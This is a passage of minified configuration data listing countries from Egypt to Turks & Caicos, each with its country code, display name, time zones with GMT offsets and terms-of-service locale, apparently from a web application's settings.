Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"EG",displayName:"Egypt",defaultTimeZoneId:"Africa/Cairo",timeZone:[{timeZoneId:"Africa/Cairo",displayName:"(GMT+02:00) Egypt Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SV",displayName:"El Salvador",defaultTimeZoneId:"America/El_Salvador",timeZone:[{timeZoneId:"America/El_Salvador",displayName:"(GMT-06:00) El Salvador Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"EE",displayName:"Estonia",defaultTimeZoneId:"Europe/Tallinn",timeZone:[{timeZoneId:"Europe/Tallinn",displayName:"(GMT+03:00) Estonia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"FK",displayName:"Falkland Islands (Islas Malvinas)",defaultTimeZoneId:"Atlantic/Stanley",timeZone:[{timeZoneId:"Atlantic/Stanley",displayName:"(GMT-03:00) Falkland Islands (Islas Malvinas) Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"FO",displayName:"Faroe Islands",defaultTimeZoneId:"Atlantic/Faeroe",timeZone:[{timeZoneId:"Atlantic/Faeroe",displayName:"(GMT+01:00) Faroe Islands Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"FJ",displayName:"Fiji",defaultTimeZoneId:"Pacific/Fiji",timeZone:[{timeZoneId:"Pacific/Fiji",displayName:"(GMT+12:00) Fiji Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"FI",displayName:"Finland",defaultTimeZoneId:"Europe/Helsinki",timeZone:[{timeZoneId:"Europe/Helsinki",displayName:"(GMT+03:00) Finland Time"}],tosLocale:{language:"fi",country:"FI"}},{countryCode:"FR",displayName:"France",defaultTimeZoneId:"Europe/Paris",timeZone:[{timeZoneId:"Europe/Paris",displayName:"(GMT+02:00) France Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"GF",displayName:"French Guiana",defaultTimeZoneId:"America/Cayenne",timeZone:[{timeZoneId:"America/Cayenne",displayName:"(GMT-03:00) French Guiana Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"PF",displayName:"French Polynesia",defaultTimeZoneId:"Pacific/Tahiti",timeZone:[{timeZoneId:"Pacific/Tahiti",displayName:"(GMT-10:00) Tahiti Time"},{timeZoneId:"Pacific/Marquesas",displayName:"(GMT-09:30) Marquesas Time"},{timeZoneId:"Pacific/Gambier",displayName:"(GMT-09:00) Gambier Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"TF",displayName:"French Southern Territories",defaultTimeZoneId:"Indian/Kerguelen",timeZone:[{timeZoneId:"Indian/Kerguelen",displayName:"(GMT+05:00) French Southern Territories Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"GE",displayName:"Georgia",defaultTimeZoneId:"Asia/Tbilisi",timeZone:[{timeZoneId:"Asia/Tbilisi",displayName:"(GMT+04:00) Georgia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"DE",displayName:"Germany",defaultTimeZoneId:"Europe/Berlin",timeZone:[{timeZoneId:"Europe/Berlin",displayName:"(GMT+02:00) Germany Time"}],tosLocale:{language:"de",country:"DE"}},{countryCode:"GH",displayName:"Ghana",defaultTimeZoneId:"Africa/Accra",timeZone:[{timeZoneId:"Africa/Accra",displayName:"(GMT+00:00) Ghana Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"GI",displayName:"Gibraltar",defaultTimeZoneId:"Europe/Gibraltar",timeZone:[{timeZoneId:"Europe/Gibraltar",displayName:"(GMT+02:00) Gibraltar Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"GR",displayName:"Greece",defaultTimeZoneId:"Europe/Athens",timeZone:[{timeZoneId:"Europe/Athens",displayName:"(GMT+03:00) Greece Time"}],tosLocale:{language:"el",country:"GR"}},{countryCode:"GL",displayName:"Greenland",defaultTimeZoneId:"America/Thule",timeZone:[{timeZoneId:"America/Thule",displayName:"(GMT-03:00) Thule Time"},{timeZoneId:"America/Godthab",displayName:"(GMT-02:00) Nuuk Time"},{timeZoneId:"America/Scoresbysund",displayName:"(GMT+00:00) Ittoqqortoormiit Time"},{timeZoneId:"America/Danmarkshavn",displayName:"(GMT+00:00) Danmarkshavn Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"GU",displayName:"Guam",defaultTimeZoneId:"Pacific/Guam",timeZone:[{timeZoneId:"Pacific/Guam",displayName:"(GMT+10:00) Guam Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"GT",displayName:"Guatemala",defaultTimeZoneId:"America/Guatemala",timeZone:[{timeZoneId:"America/Guatemala",displayName:"(GMT-06:00) Guatemala Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"GW",displayName:"Guinea-Bissau",defaultTimeZoneId:"Africa/Bissau",timeZone:[{timeZoneId:"Africa/Bissau",displayName:"(GMT+00:00) Guinea-Bissau Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"GY",displayName:"Guyana",defaultTimeZoneId:"America/Guyana",timeZone:[{timeZoneId:"America/Guyana",displayName:"(GMT-04:00) Guyana Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"HT",displayName:"Haiti",defaultTimeZoneId:"America/Port-au-Prince",timeZone:[{timeZoneId:"America/Port-au-Prince",displayName:"(GMT-04:00) Haiti Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"HN",displayName:"Honduras",defaultTimeZoneId:"America/Tegucigalpa",timeZone:[{timeZoneId:"America/Tegucigalpa",displayName:"(GMT-06:00) Honduras Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"HK",displayName:"Hong Kong",defaultTimeZoneId:"Asia/Hong_Kong",timeZone:[{timeZoneId:"Asia/Hong_Kong",displayName:"(GMT+08:00) Hong Kong Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"HU",displayName:"Hungary",defaultTimeZoneId:"Europe/Budapest",timeZone:[{timeZoneId:"Europe/Budapest",displayName:"(GMT+02:00) Hungary Time"}],tosLocale:{language:"hu",country:"HU"}},{countryCode:"IS",displayName:"Iceland",defaultTimeZoneId:"Atlantic/Reykjavik",timeZone:[{timeZoneId:"Atlantic/Reykjavik",displayName:"(GMT+00:00) Iceland Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"IN",displayName:"India",defaultTimeZoneId:"Asia/Calcutta",timeZone:[{timeZoneId:"Asia/Calcutta",displayName:"(GMT+05:30) India Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"ID",displayName:"Indonesia",defaultTimeZoneId:"Asia/Jakarta",timeZone:[{timeZoneId:"Asia/Jakarta",displayName:"(GMT+07:00) Jakarta Time"},{timeZoneId:"Asia/Makassar",displayName:"(GMT+08:00) Makassar Time"},{timeZoneId:"Asia/Jayapura",displayName:"(GMT+09:00) Jayapura Time"}],tosLocale:{language:"in",country:"ID"}},{countryCode:"IR",displayName:"Iran",defaultTimeZoneId:"Asia/Tehran",timeZone:[{timeZoneId:"Asia/Tehran",displayName:"(GMT+04:30) Iran Time"}]},{countryCode:"IQ",displayName:"Iraq",defaultTimeZoneId:"Asia/Baghdad",timeZone:[{timeZoneId:"Asia/Baghdad",displayName:"(GMT+03:00) Iraq Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"IE",displayName:"Ireland",defaultTimeZoneId:"Europe/Dublin",timeZone:[{timeZoneId:"Europe/Dublin",displayName:"(GMT+01:00) Ireland Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"IL",displayName:"Israel",defaultTimeZoneId:"Asia/Jerusalem",timeZone:[{timeZoneId:"Asia/Jerusalem",displayName:"(GMT+03:00) Israel Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"IT",displayName:"Italy",defaultTimeZoneId:"Europe/Rome",timeZone:[{timeZoneId:"Europe/Rome",displayName:"(GMT+02:00) Italy Time"}],tosLocale:{language:"it",country:"IT"}},{countryCode:"JM",displayName:"Jamaica",defaultTimeZoneId:"America/Jamaica",timeZone:[{timeZoneId:"America/Jamaica",displayName:"(GMT-05:00) Jamaica Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"JP",displayName:"Japan",defaultTimeZoneId:"Asia/Tokyo",timeZone:[{timeZoneId:"Asia/Tokyo",displayName:"(GMT+09:00) Japan Time"}],tosLocale:{language:"ja",country:"JP"}},{countryCode:"JO",displayName:"Jordan",defaultTimeZoneId:"Asia/Amman",timeZone:[{timeZoneId:"Asia/Amman",displayName:"(GMT+03:00) Jordan Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"KZ",displayName:"Kazakhstan",defaultTimeZoneId:"Asia/Aqtau",timeZone:[{timeZoneId:"Asia/Aqtau",displayName:"(GMT+05:00) Aqtau Time"},{timeZoneId:"Asia/Aqtobe",displayName:"(GMT+05:00) Aqtobe Time"},{timeZoneId:"Asia/Almaty",displayName:"(GMT+06:00) Almaty Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"KE",displayName:"Kenya",defaultTimeZoneId:"Africa/Nairobi",timeZone:[{timeZoneId:"Africa/Nairobi",displayName:"(GMT+03:00) Kenya Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"KI",displayName:"Kiribati",defaultTimeZoneId:"Pacific/Tarawa",timeZone:[{timeZoneId:"Pacific/Tarawa",displayName:"(GMT+12:00) Tarawa Time"},{timeZoneId:"Pacific/Enderbury",displayName:"(GMT+13:00) Enderbury Time"},{timeZoneId:"Pacific/Kiritimati",displayName:"(GMT+14:00) Kiritimati Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"KG",displayName:"Kyrgyzstan",defaultTimeZoneId:"Asia/Bishkek",timeZone:[{timeZoneId:"Asia/Bishkek",displayName:"(GMT+06:00) Kyrgyzstan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"LV",displayName:"Latvia",defaultTimeZoneId:"Europe/Riga",timeZone:[{timeZoneId:"Europe/Riga",displayName:"(GMT+03:00) Latvia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"LB",displayName:"Lebanon",defaultTimeZoneId:"Asia/Beirut",timeZone:[{timeZoneId:"Asia/Beirut",displayName:"(GMT+03:00) Lebanon Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"LR",displayName:"Liberia",defaultTimeZoneId:"Africa/Monrovia",timeZone:[{timeZoneId:"Africa/Monrovia",displayName:"(GMT+00:00) Liberia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"LY",displayName:"Libya",defaultTimeZoneId:"Africa/Tripoli",timeZone:[{timeZoneId:"Africa/Tripoli",displayName:"(GMT+02:00) Libya Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"LT",displayName:"Lithuania",defaultTimeZoneId:"Europe/Vilnius",timeZone:[{timeZoneId:"Europe/Vilnius",displayName:"(GMT+03:00) Lithuania Time"}],tosLocale:{language:"lt",country:"LT"}},{countryCode:"LU",displayName:"Luxembourg",defaultTimeZoneId:"Europe/Luxembourg",timeZone:[{timeZoneId:"Europe/Luxembourg",displayName:"(GMT+02:00) Luxembourg Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MO",displayName:"Macao",defaultTimeZoneId:"Asia/Macau",timeZone:[{timeZoneId:"Asia/Macau",displayName:"(GMT+08:00) Macao Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MY",displayName:"Malaysia",defaultTimeZoneId:"Asia/Kuala_Lumpur",timeZone:[{timeZoneId:"Asia/Kuala_Lumpur",displayName:"(GMT+08:00) Malaysia Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MV",displayName:"Maldives",defaultTimeZoneId:"Indian/Maldives",timeZone:[{timeZoneId:"Indian/Maldives",displayName:"(GMT+05:00) Maldives Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MT",displayName:"Malta",defaultTimeZoneId:"Europe/Malta",timeZone:[{timeZoneId:"Europe/Malta",displayName:"(GMT+02:00) Malta Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MH",displayName:"Marshall Islands",defaultTimeZoneId:"Pacific/Kwajalein",timeZone:[{timeZoneId:"Pacific/Kwajalein",displayName:"(GMT+12:00) Kwajalein Time"},{timeZoneId:"Pacific/Majuro",displayName:"(GMT+12:00) Marshall Islands Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MQ",displayName:"Martinique",defaultTimeZoneId:"America/Martinique",timeZone:[{timeZoneId:"America/Martinique",displayName:"(GMT-04:00) Martinique Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"MU",displayName:"Mauritius",defaultTimeZoneId:"Indian/Mauritius",timeZone:[{timeZoneId:"Indian/Mauritius",displayName:"(GMT+04:00) Mauritius Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MX",displayName:"Mexico",defaultTimeZoneId:"America/Tijuana",timeZone:[{timeZoneId:"America/Tijuana",displayName:"(GMT-07:00) Tijuana Time"},{timeZoneId:"America/Mazatlan",displayName:"(GMT-06:00) Mazatlan Time"},{timeZoneId:"America/Hermosillo",displayName:"(GMT-07:00) Hermosillo Time"},{timeZoneId:"America/Mexico_City",displayName:"(GMT-05:00) Mexico City Time"},{timeZoneId:"America/Cancun",displayName:"(GMT-05:00) Cancun Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"FM",displayName:"Micronesia",defaultTimeZoneId:"Pacific/Truk",timeZone:[{timeZoneId:"Pacific/Truk",displayName:"(GMT+10:00) Chuuk Time"},{timeZoneId:"Pacific/Kosrae",displayName:"(GMT+11:00) Kosrae Time"},{timeZoneId:"Pacific/Ponape",displayName:"(GMT+11:00) Pohnpei Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MD",displayName:"Moldova",defaultTimeZoneId:"Europe/Chisinau",timeZone:[{timeZoneId:"Europe/Chisinau",displayName:"(GMT+03:00) Moldova Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MC",displayName:"Monaco",defaultTimeZoneId:"Europe/Monaco",timeZone:[{timeZoneId:"Europe/Monaco",displayName:"(GMT+02:00) Monaco Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MN",displayName:"Mongolia",defaultTimeZoneId:"Asia/Hovd",timeZone:[{timeZoneId:"Asia/Hovd",displayName:"(GMT+07:00) Hovd Time"},{timeZoneId:"Asia/Choibalsan",displayName:"(GMT+08:00) Choibalsan Time"},{timeZoneId:"Asia/Ulaanbaatar",displayName:"(GMT+08:00) Ulaanbaatar Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"MA",displayName:"Morocco",defaultTimeZoneId:"Africa/Casablanca",timeZone:[{timeZoneId:"Africa/Casablanca",displayName:"(GMT+01:00) Morocco Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MZ",displayName:"Mozambique",defaultTimeZoneId:"Africa/Maputo",timeZone:[{timeZoneId:"Africa/Maputo",displayName:"(GMT+02:00) Mozambique Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"MM",displayName:"Myanmar (Burma)",defaultTimeZoneId:"Asia/Rangoon",timeZone:[{timeZoneId:"Asia/Rangoon",displayName:"(GMT+06:30) Myanmar (Burma) Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"NA",displayName:"Namibia",defaultTimeZoneId:"Africa/Windhoek",timeZone:[{timeZoneId:"Africa/Windhoek",displayName:"(GMT+02:00) Namibia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"NR",displayName:"Nauru",defaultTimeZoneId:"Pacific/Nauru",timeZone:[{timeZoneId:"Pacific/Nauru",displayName:"(GMT+12:00) Nauru Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"NP",displayName:"Nepal",defaultTimeZoneId:"Asia/Katmandu",timeZone:[{timeZoneId:"Asia/Katmandu",displayName:"(GMT+05:45) Nepal Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"NL",displayName:"Netherlands",defaultTimeZoneId:"Europe/Amsterdam",timeZone:[{timeZoneId:"Europe/Amsterdam",displayName:"(GMT+02:00) Netherlands Time"}],tosLocale:{language:"nl",country:"NL"}},{countryCode:"NC",displayName:"New Caledonia",defaultTimeZoneId:"Pacific/Noumea",timeZone:[{timeZoneId:"Pacific/Noumea",displayName:"(GMT+11:00) New Caledonia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"NZ",displayName:"New Zealand",defaultTimeZoneId:"Pacific/Auckland",timeZone:[{timeZoneId:"Pacific/Auckland",displayName:"(GMT+12:00) New Zealand Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"NI",displayName:"Nicaragua",defaultTimeZoneId:"America/Managua",timeZone:[{timeZoneId:"America/Managua",displayName:"(GMT-06:00) Nicaragua Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"NG",displayName:"Nigeria",defaultTimeZoneId:"Africa/Lagos",timeZone:[{timeZoneId:"Africa/Lagos",displayName:"(GMT+01:00) Nigeria Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"NU",displayName:"Niue",defaultTimeZoneId:"Pacific/Niue",timeZone:[{timeZoneId:"Pacific/Niue",displayName:"(GMT-11:00) Niue Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"NF",displayName:"Norfolk Island",defaultTimeZoneId:"Pacific/Norfolk",timeZone:[{timeZoneId:"Pacific/Norfolk",displayName:"(GMT+11:00) Norfolk Island Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"KP",displayName:"North Korea",defaultTimeZoneId:"Asia/Pyongyang",timeZone:[{timeZoneId:"Asia/Pyongyang",displayName:"(GMT+09:00) North Korea Time"}]},{countryCode:"MK",displayName:"North Macedonia",defaultTimeZoneId:"Europe/Skopje",timeZone:[{timeZoneId:"Europe/Skopje",displayName:"(GMT+02:00) North Macedonia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"NO",displayName:"Norway",defaultTimeZoneId:"Europe/Oslo",timeZone:[{timeZoneId:"Europe/Oslo",displayName:"(GMT+02:00) Norway Time"}],tosLocale:{language:"no",country:"NO"}},{countryCode:"PK",displayName:"Pakistan",defaultTimeZoneId:"Asia/Karachi",timeZone:[{timeZoneId:"Asia/Karachi",displayName:"(GMT+05:00) Pakistan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"PW",displayName:"Palau",defaultTimeZoneId:"Pacific/Palau",timeZone:[{timeZoneId:"Pacific/Palau",displayName:"(GMT+09:00) Palau Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"PS",displayName:"Palestine",defaultTimeZoneId:"Asia/Gaza",timeZone:[{timeZoneId:"Asia/Gaza",displayName:"(GMT+03:00) Gaza Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"PA",displayName:"Panama",defaultTimeZoneId:"America/Panama",timeZone:[{timeZoneId:"America/Panama",displayName:"(GMT-05:00) Panama Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"PG",displayName:"Papua New Guinea",defaultTimeZoneId:"Pacific/Port_Moresby",timeZone:[{timeZoneId:"Pacific/Port_Moresby",displayName:"(GMT+10:00) Port Moresby Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"PY",displayName:"Paraguay",defaultTimeZoneId:"America/Asuncion",timeZone:[{timeZoneId:"America/Asuncion",displayName:"(GMT-04:00) Paraguay Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"PE",displayName:"Peru",defaultTimeZoneId:"America/Lima",timeZone:[{timeZoneId:"America/Lima",displayName:"(GMT-05:00) Peru Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"PH",displayName:"Philippines",defaultTimeZoneId:"Asia/Manila",timeZone:[{timeZoneId:"Asia/Manila",displayName:"(GMT+08:00) Philippines Time"}],tosLocale:{language:"tl",country:"PH"}},{countryCode:"PN",displayName:"Pitcairn Islands",defaultTimeZoneId:"Pacific/Pitcairn",timeZone:[{timeZoneId:"Pacific/Pitcairn",displayName:"(GMT-08:00) Pitcairn Islands Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"PL",displayName:"Poland",defaultTimeZoneId:"Europe/Warsaw",timeZone:[{timeZoneId:"Europe/Warsaw",displayName:"(GMT+02:00) Poland Time"}],tosLocale:{language:"pl",country:"PL"}},{countryCode:"PT",displayName:"Portugal",defaultTimeZoneId:"Atlantic/Azores",timeZone:[{timeZoneId:"Atlantic/Azores",displayName:"(GMT+00:00) Azores Time"},{timeZoneId:"Europe/Lisbon",displayName:"(GMT+01:00) Portugal Time"}],tosLocale:{language:"pt",country:"PT"}},{countryCode:"PR",displayName:"Puerto Rico",defaultTimeZoneId:"America/Puerto_Rico",timeZone:[{timeZoneId:"America/Puerto_Rico",displayName:"(GMT-04:00) Puerto Rico Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"QA",displayName:"Qatar",defaultTimeZoneId:"Asia/Qatar",timeZone:[{timeZoneId:"Asia/Qatar",displayName:"(GMT+03:00) Qatar Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"RE",displayName:"Réunion",defaultTimeZoneId:"Indian/Reunion",timeZone:[{timeZoneId:"Indian/Reunion",displayName:"(GMT+04:00) Réunion Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"RO",displayName:"Romania",defaultTimeZoneId:"Europe/Bucharest",timeZone:[{timeZoneId:"Europe/Bucharest",displayName:"(GMT+03:00) Romania Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"RU",displayName:"Russia",defaultTimeZoneId:"Europe/Kaliningrad",timeZone:[{timeZoneId:"Europe/Kaliningrad",displayName:"(GMT+02:00) Kaliningrad Time"},{timeZoneId:"Europe/Moscow",displayName:"(GMT+03:00) Moscow Time"},{timeZoneId:"Europe/Samara",displayName:"(GMT+04:00) Samara Time"},{timeZoneId:"Asia/Yekaterinburg",displayName:"(GMT+05:00) Yekaterinburg Time"},{timeZoneId:"Asia/Omsk",displayName:"(GMT+06:00) Omsk Time"},{timeZoneId:"Asia/Krasnoyarsk",displayName:"(GMT+07:00) Krasnoyarsk Time"},{timeZoneId:"Asia/Irkutsk",displayName:"(GMT+08:00) Irkutsk Time"},{timeZoneId:"Asia/Yakutsk",displayName:"(GMT+09:00) Yakutsk Time"},{timeZoneId:"Asia/Vladivostok",displayName:"(GMT+10:00) Vladivostok Time"},{timeZoneId:"Asia/Magadan",displayName:"(GMT+11:00) Magadan Time"},{timeZoneId:"Asia/Kamchatka",displayName:"(GMT+12:00) Kamchatka Time"}],tosLocale:{language:"ru",country:"RU"}},{countryCode:"WS",displayName:"Samoa",defaultTimeZoneId:"Pacific/Apia",timeZone:[{timeZoneId:"Pacific/Apia",displayName:"(GMT+13:00) Samoa Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"SM",displayName:"San Marino",defaultTimeZoneId:"Europe/San_Marino",timeZone:[{timeZoneId:"Europe/San_Marino",displayName:"(GMT+02:00) San Marino Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"ST",displayName:"São Tomé & Príncipe",defaultTimeZoneId:"Africa/Sao_Tome",timeZone:[{timeZoneId:"Africa/Sao_Tome",displayName:"(GMT+00:00) São Tomé & Príncipe Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SA",displayName:"Saudi Arabia",defaultTimeZoneId:"Asia/Riyadh",timeZone:[{timeZoneId:"Asia/Riyadh",displayName:"(GMT+03:00) Saudi Arabia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"RS",displayName:"Serbia",defaultTimeZoneId:"Europe/Belgrade",timeZone:[{timeZoneId:"Europe/Belgrade",displayName:"(GMT+02:00) Serbia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SC",displayName:"Seychelles",defaultTimeZoneId:"Indian/Mahe",timeZone:[{timeZoneId:"Indian/Mahe",displayName:"(GMT+04:00) Seychelles Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SG",displayName:"Singapore",defaultTimeZoneId:"Asia/Singapore",timeZone:[{timeZoneId:"Asia/Singapore",displayName:"(GMT+08:00) Singapore Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"SK",displayName:"Slovakia",defaultTimeZoneId:"Europe/Bratislava",timeZone:[{timeZoneId:"Europe/Bratislava",displayName:"(GMT+02:00) Slovakia Time"}],tosLocale:{language:"sk",country:"SK"}},{countryCode:"SI",displayName:"Slovenia",defaultTimeZoneId:"Europe/Ljubljana",timeZone:[{timeZoneId:"Europe/Ljubljana",displayName:"(GMT+02:00) Slovenia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SB",displayName:"Solomon Islands",defaultTimeZoneId:"Pacific/Guadalcanal",timeZone:[{timeZoneId:"Pacific/Guadalcanal",displayName:"(GMT+11:00) Solomon Islands Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"ZA",displayName:"South Africa",defaultTimeZoneId:"Africa/Johannesburg",timeZone:[{timeZoneId:"Africa/Johannesburg",displayName:"(GMT+02:00) South Africa Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"GS",displayName:"South Georgia & South Sandwich Islands",defaultTimeZoneId:"Atlantic/South_Georgia",timeZone:[{timeZoneId:"Atlantic/South_Georgia",displayName:"(GMT-02:00) South Georgia & South Sandwich Islands Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"KR",displayName:"South Korea",defaultTimeZoneId:"Asia/Seoul",timeZone:[{timeZoneId:"Asia/Seoul",displayName:"(GMT+09:00) South Korea Time"}],tosLocale:{language:"ko",country:"KR"}},{countryCode:"ES",displayName:"Spain",defaultTimeZoneId:"Atlantic/Canary",timeZone:[{timeZoneId:"Atlantic/Canary",displayName:"(GMT+01:00) Canary Time"},{timeZoneId:"Africa/Ceuta",displayName:"(GMT+02:00) Ceuta Time"},{timeZoneId:"Europe/Madrid",displayName:"(GMT+02:00) Spain Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"LK",displayName:"Sri Lanka",defaultTimeZoneId:"Asia/Colombo",timeZone:[{timeZoneId:"Asia/Colombo",displayName:"(GMT+05:30) Sri Lanka Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"PM",displayName:"St. Pierre & Miquelon",defaultTimeZoneId:"America/Miquelon",timeZone:[{timeZoneId:"America/Miquelon",displayName:"(GMT-02:00) St. Pierre & Miquelon Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SD",displayName:"Sudan",defaultTimeZoneId:"Africa/Khartoum",timeZone:[{timeZoneId:"Africa/Khartoum",displayName:"(GMT+02:00) Sudan Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SR",displayName:"Suriname",defaultTimeZoneId:"America/Paramaribo",timeZone:[{timeZoneId:"America/Paramaribo",displayName:"(GMT-03:00) Suriname Time"}],tosLocale:{language:"nl",country:"NL"}},{countryCode:"SJ",displayName:"Svalbard & Jan Mayen",defaultTimeZoneId:"Arctic/Longyearbyen",timeZone:[{timeZoneId:"Arctic/Longyearbyen",displayName:"(GMT+02:00) Svalbard & Jan Mayen Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"SE",displayName:"Sweden",defaultTimeZoneId:"Europe/Stockholm",timeZone:[{timeZoneId:"Europe/Stockholm",displayName:"(GMT+02:00) Sweden Time"}],tosLocale:{language:"sv",country:"SE"}},{countryCode:"CH",displayName:"Switzerland",defaultTimeZoneId:"Europe/Zurich",timeZone:[{timeZoneId:"Europe/Zurich",displayName:"(GMT+02:00) Switzerland Time"}],tosLocale:{language:"de",country:"DE"}},{countryCode:"SY",displayName:"Syria",defaultTimeZoneId:"Asia/Damascus",timeZone:[{timeZoneId:"Asia/Damascus",displayName:"(GMT+03:00) Syria Time"}]},{countryCode:"TW",displayName:"Taiwan",defaultTimeZoneId:"Asia/Taipei",timeZone:[{timeZoneId:"Asia/Taipei",displayName:"(GMT+08:00) Taiwan Time"}],tosLocale:{language:"zh",country:"TW"}},{countryCode:"TJ",displayName:"Tajikistan",defaultTimeZoneId:"Asia/Dushanbe",timeZone:[{timeZoneId:"Asia/Dushanbe",displayName:"(GMT+05:00) Tajikistan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TH",displayName:"Thailand",defaultTimeZoneId:"Asia/Bangkok",timeZone:[{timeZoneId:"Asia/Bangkok",displayName:"(GMT+07:00) Thailand Time"}],tosLocale:{language:"th",country:"TH"}},{countryCode:"TL",displayName:"Timor-Leste",defaultTimeZoneId:"Asia/Dili",timeZone:[{timeZoneId:"Asia/Dili",displayName:"(GMT+09:00) Timor-Leste Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TK",displayName:"Tokelau",defaultTimeZoneId:"Pacific/Fakaofo",timeZone:[{timeZoneId:"Pacific/Fakaofo",displayName:"(GMT+13:00) Tokelau Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TO",displayName:"Tonga",defaultTimeZoneId:"Pacific/Tongatapu",timeZone:[{timeZoneId:"Pacific/Tongatapu",displayName:"(GMT+13:00) Tonga Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TT",displayName:"Trinidad & Tobago",defaultTimeZoneId:"America/Port_of_Spain",timeZone:[{timeZoneId:"America/Port_of_Spain",displayName:"(GMT-04:00) Trinidad & Tobago Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TN",displayName:"Tunisia",defaultTimeZoneId:"Africa/Tunis",timeZone:[{timeZoneId:"Africa/Tunis",displayName:"(GMT+01:00) Tunisia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"TR",displayName:"Turkey",defaultTimeZoneId:"Europe/Istanbul",timeZone:[{timeZoneId:"Europe/Istanbul",displayName:"(GMT+03:00) Turkey Time"}],tosLocale:{language:"tr",country:"TR"}},{countryCode:"TM",displayName:"Turkmenistan",defaultTimeZoneId:"Asia/Ashgabat",timeZone:[{timeZoneId:"Asia/Ashgabat",displayName:"(GMT+05:00) Turkmenistan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"TC",displayName:"Turks & 